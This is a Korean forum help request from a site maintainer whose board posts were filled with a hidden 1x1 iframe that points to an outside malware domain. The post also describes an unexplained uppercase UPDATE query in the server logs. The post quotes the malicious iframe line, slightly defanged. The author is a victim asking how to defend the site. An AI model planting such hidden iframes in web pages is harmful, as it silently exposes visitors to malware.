SQL인젝션공격은 아닌 쿼리공격이 들어오네요

현재 사이트를 유지보수 하고 있으며 서버는 APM 입니다.

사이트에 이런 악성코드가 숨어있었습니다. <iFrame src=http://cmpi.co.kr/index.htn frameBorder="0" width="1" height="1" ></iframe>  ( 물론 htm입니다. 악성코드로 연결되므로..)

확인해보니 저런 코드를 특정 게시판 모든 게시물 내용안에 추가시켰고 관리자만 접근 가능한 게시판 게시물 제목에 저런 코드를 추가하더군요.

로그를 살펴보니 "UPDATE xx_games SET ...... 뒤에 엄청나게깁니다..." 이렇게 써놨던데 저는 프로그램 짤때 쿼리안에 대문자를 넣지 않습니다.

더군다나 모든 프로그램안에 테이블명 xx_games에 업데이트 하는 쿼리는 전부 소문자로 되어있습니다.. SQL 인젝션 공격은 아닌 것으로 판단됩니다만 어떻게 저런 쿼리를 집어 넣는지 도통 감이 오질 않습니다.

1. 한 게시판의 모든 게시물에 악성html 코드를 추가(업데이트)한 것.

2. 프로그램에서는 사용하지 않는 쿼리를 사용한 것. (비슷한 쿼리는 있습니다. 소문자로 된)

3. 수십개의 Column 을 가지고 있는 테이블의 Column을 모두 알고 쿼리를 만든것.

이제는 몇시간 간격으로  하나의 쿼리만 날리는 데 그것만 수정하고 있습니다.

제가 지식이 짧아서 IP를 추적한다거나 공격을 방어한다거나

어떻게 해야 할지를 모르고 있습니다..

답변부탁드릴께요